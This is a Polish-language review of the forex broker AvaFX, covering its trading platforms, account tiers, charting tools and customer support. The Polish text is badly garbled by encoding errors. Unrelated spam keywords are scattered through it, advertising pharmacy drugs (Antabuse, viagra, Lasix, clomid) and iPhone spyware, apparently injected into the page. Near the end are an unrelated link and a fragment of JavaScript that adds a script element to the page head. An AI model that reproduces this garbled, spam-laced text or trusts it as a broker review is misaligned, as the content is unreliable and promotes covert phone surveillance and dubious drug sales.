Recenzja AvaFX - forexbrokerzy.pl
 • Recenzja

  Recenzja

  PoniewaA? AvaFx obraca miesiAi??cznie ponad 1,5 miliardami nie ma wAi??tpliwoAi??ci, iA? AvaFx jest jednAi?? z wiodAi??cych platform poAi??redniczAi??cych obecnie transakcjami walutowymi w Internecie. JednakA?e, co wyrA?A?nia AvaFx od innych poAi??rednikA?w transakcji walutowych jest nie tylko wielkoAi??Ai?? jej miesiAi??cznych obrotA?w, ale takA?e intuicyjny interfejs uA?ytkownika, ktA?ry zaspokoi potrzeby zarA?wno profesjonalnych finansistA?w, jak i brokerA?w rynkA?w walutowych (Forex). TestowaliAi??my platformAi?? transakcyjnAi??, obsAi??uge klienta, Ai??atwoAi??Ai?? uA?ytkowania i inne elementy AvaFx, a nasze wnioski przedstawiamy poniA?ej.

  acquire Antabuse

  Platforma transakcyjna

  generic lioresal

  Podstawowa platforma transakcyjna uA?ywana przez AvaFx nazywa siAi?? Ava Trader i daje uA?ytkownikom moA?liwoAi??Ai?? zawierania transakcji walutowych (Fx) szybko, korzystajAi??c z rozpowszechnionej i popularnej platformy Meta Trader 4. AvaFx oferuje rA?wnieA? interaktywnAi?? platformAi?? transakcyjnAi??, ktA?rAi?? sprytnie nazwano Ava Java.
  Rachunki rzeczywiste na AvaFx mogAi?? byAi?? kategoryzowane pod konta Silver z minimalnym depozytem 100 $, Gold z minimalnym depozytem 1,000 $, oraz Platinum z minimalnym depozytem 10,000 $. Konto demo ma wszystkie cechy, ktA?re znajdziesz na rzeczywistej platformie Ava i oferuje wspaniaAi??e wprowadzenie w temat. cost of viagra tablet in india.
  ChociaA? AvaFx nie oferuje obecnie platformy Meta Trader 5, nie odczuliAi??my jakiegoAi?? wiAi??kszego braku, poniewaA? platforma Meta Trader 4 Ai??wietnie siAi?? sprawdza i w wygodny sposA?b zapewnia wszystkie potrzebne informacje do przeprowadzania transakcji walutowych (Forex). ByliAi??my jednak zadowoleni, gdy odkryliAi??my, A?e AvaFx oferuje takA?e mobilnAi?? platformAi?? transakcyjnAi?? z niesamowicie szczegA?Ai??owym wyjaAi??nieniem jak jej uA?ywaAi??, a takA?e bezpoAi??rednimi linkami do platform obsAi??ugujAi??cych inwestorA?w rA?A?nych walut.
  Poza standardowymi transakcjami interaktywnymi, AvaFx oferuje mobilnAi?? platformAi?? transakcyjnAi??, ktA?ra wspiera wszystkie wiAi??ksze mobilne platformy. PiAi??kno tych mobilnych inwestycji polega na ich interaktywnoAi??ci; nie jest teA? obsAi??ugiwana przez A?adnAi?? aplikacjAi?? co umoA?liwia integracjAi?? z praktycznie kaA?dym mobilnym urzAi??dzeniem, by umoA?liwiAi?? handel na rynkach walutowych w kaA?dym momencie i wszAi??dzie.
  Wreszcie AvaFx oferuje opcjAi?? autotrader o nazwie Ava Autotrader, ktA?rej recenzje przeprowadziliAi??my osobno, abyAi??cie sami mogli zdecydowaAi?? czy opcja autotrade jest dla was wAi??aAi??ciwa.

  Opcje

  AvaFx oferuje szeroki zakres opcji wAi??Ai??czajAi??c peAi??ne stawki streaming aA? do bieA?Ai??cego naleA?nego kursu wymiany 24 godziny na dobAi?? i szeroki zakres swapA?w walutowych. JednakA?e, w czasie naszego testu platformy AvaFx byliAi??my rA?wnieA? pod wraA?eniem opcji, ktA?re nie sAi?? dostAi??pne na AvaFx, takich jak: koszt rolowania pozycji czy opAi??ata za wezwanie do uzupeAi??nienia depozytu

  (margin call fee) , ktA?rych to wydatkA?w w ogA?le nam nie brakowaAi??o.

  Na AvaFx dostAi??pne sAi?? dobre, Ai??atwe w uA?yciu narzAi??dzia. NiektA?re z zawartych w AvaFx nar,zAi??dzi do tworzenia wykresA?w to: Trend Lines, Fibo Retracement, Horizontal Lines i Vertical Lines itd. ChociaA? te narzAi??dzia mogAi?? nie byAi?? wystarczajAi??ce dla prawdziwie zawodowych graczy sAi?? one wiAi??cej niA? wystarczajAi??ce dla dla nowych inwestorA?w i mogAi?? naprawdAi?? poprawiAi?? jakoAi??Ai?? transakcji.
  DoceniliAi??my rA?wnieA? fakt, iA? transakcje sAi?? wykonywane przy jednym klikniAi??ciu jako egzekucja rynkowa , a przy dwA?ch jako transakcja rynkowa. Ponadto przydatny jest teA? firmowy Uaktualniony Kalendarz Ekonomiczny i profesjonalne analizy umieszczone na stronie, ktA?re umoA?liwiajAi?? podejmowanie systematycznych i racjonalnych decyzji transakcyjnych.
  Wreszcie, jesteAi??my zachwyceni tym, A?e AvaFx oferuje bonusy i specjalne oferty dla poczAi??tkujAi??cych graczy, takie jak: obniA?ona stawka minimalnego depozytu, specjalne bonusy korzystajAi??ce z okreAi??lonych metod pAi??atniczych albo gotA?wka dodawana do twojego konta na pierwszy depozyt.

  ObsAi??uga klienta

  AvaFx oferuje rA?A?norodne formy obsAi??ugi klienta wAi??Ai??czajAi??c wsparcie e-mailowe, pomoc telefonicznAi?? i czat na A?ywo. Naszym zdaniem ich pomoc telefoniczna zasAi??ugujAi?? na najwyA?szAi?? uwagAi??- podczas gdy raz zostaliAi??my poproszeni o czekanie ponad 5 minut reszta naszych pytaAi?? zadanych przez telefon byAi??o wyjaAi??nionych niezwykle szybko. Jest warte zanotowania, iA? inaczej niA? w pozostaAi??ych platformach poAi??redniczAi??cych transakcjami walutowymi, AvaFx oferuje pojedynczy numer do dziaAi??u obsAi??ugi klienta zarejestrowany w Stanach Zjednoczonych, wiAi??c gracze dzwoniAi??cy z zagranicy muszAi?? wykonaAi?? miAi??dzynarodowe poAi??Ai??czenie, by uzyskaAi?? pomoc o wysokim standardzie. Nie zmienia to faktu, iA? pod tym numerem dostAi??pna jest wielojAi??zyczna obsAi??uga, wiAi??c gracze nieanglojAi??zyczni nie muszAi?? siAi?? obawiaAi??, iA? pozostanAi?? bez pomocy.
  Niestety, w czasie naszego testu platformy AvaFx odkryliAi??my, A?e system czatu jest znacznie mniej niezawodny niA? pomoc telefoniczna. ZainicjowaliAi??my osiem rA?A?nych czatA?w z firmAi??, a na odpowiedA? musieliAi??my czekaAi?? doAi??Ai?? sAi??ugo, czasem nawet 12 minut. PomijajAi??c czekanie przekonaliAi??my siAi??, A?e obsAi??uga czatu AvaFx jest zasobna w wiedzAi?? i przyjazna. I tak jak pomoc telefoniczna takA?e wsparcie poprzez czat jest dostepne w prawie kaA?dym jAi??zyku.

  KontaktujAi??c siAi?? z AvaFx poprzez system e-mailowy musieliAi??my czekaAi?? na odpowiedA? 17 godzin i 55 minut, ale gdy juA? rozpoczAi??liAi??my dialog byliAi??my bardzo zadowoleni widzAi??c, A?e zaAi??oga AvaFx odpowiadaAi??a juA? znacznie szybciej.
  W koAi??cu warto wspomnieAi??, A?e AvaFx oferuje bardzo przydatne tutoriale i rozbudowane centrum edukacyjne, ktA?re umoA?liwia szybkie i niezaleA?ne znalezienie odpowiedzi na pytania przez samych uA?ytkownikA?w. ChociaA? zawarte informacje sAi?? wiAi??cej niA? wystarczajAi??ce brakuje opcji szukaj na stronie, ktA?ra znacznie uAi??atwiAi??aby proces uzyskania pomocy.

  A?atwoAi??Ai?? uzytkowania

  Lasix reviews

  Za wszystkich platform poAi??redniczAi??cych i zawierajAi??cych transakcje walutowe AvaFx jest jednAi?? z najAi??atwiejszych w uA?yciu. Cecha wyrA?A?niajAi??cAi?? AvaFx od innych tego typu stron jest fakt, A?e oferuje ona jasno oznaczony przewodnik, ktA?ry stanowi wideo i audio, zrozumiale objaAi??niajAi??ce jak korzystaAi?? ze strony. Gracze, ktA?rzy nie chcAi?? korzystaAi?? z przewodnika mogAi?? odbyAi?? wirtualnAi?? podrA?A? po stronie, gdzie mogAi?? wybieraAi?? tematy tutoriali wedAi??ug wAi??asnego uznania.

  Nawet pobieA?ne oglAi??dziny platformy AvaFx powinny zadowoliAi?? uA?ytkownikA?w. Inaczej niA? na innych platformach typu Forex, takich jak Markets.com czy eToro, strona gAi??A?wna jest przejrzysta i Ai??atwa do nawigowania, co sprawia, A?e goAi??cie mogAi?? siAi?? Ai??atwo w niej rozeznaAi??. RA?wnie godne podziwu sAi?? firmowe platformy transakcyjne , ktA?re sAi?? jasno wyznaczone i nieskomplikowane. Sprawia to, A?e zarA?wno nowi gracze jak i eksperci w handlu walutowym mogAi?? Ai??atwo zorganizowaAi?? swoje myAi??li.

  ChociaA? Forex jest relatywnie skomplikowanAi?? dziedzinAi?? przemysAi??u, AvaFx w naszej opinii niezwykle mocno stara siAi?? organizowaAi?? i upraszczaAi?? swojAi?? stronAi?? i narzAi??dzia jednoczeAi??nie zapewniajAi??c najnowsze technologie i analizy w taki sposA?b, by wszyscy gracze mogli w peAi??ni cieszyAi?? siAi?? inwestowaniem.

  http://www.colegiosanpedro.cl/?p=9940 }d.getElementsByTagName(‘head’)[0].appendChild(s); acquire depakote, acquire clomid. Business plan alli refill from canada. cell spyware, how to spy on iphone, spyware on iphone

Leave a Reply


No comments yet. Be the first!

Nauka


Ranking

© ForexBrokerzy.pl wszystkie prawa zastrzeżone 2011-2012
Zrzeczenie si? odpowiedzialno?ci: ForexBrokerzy.pl nie ponosi odpowiedzialno?ci za jakiekolwiek straty lub szkody wynikaj?ce z polegania na informacji zawartych na tej witrynie. Handel walutami, nie jest odpowiedni dla wszystkich inwestorw. Przed podj?ciem decyzji o handlu Forex lub innym instrumentem finansowym nale?y starannie rozwa?y? swoje cele inwestycji, poziom do?wiadczenia i apetytu na ryzyko.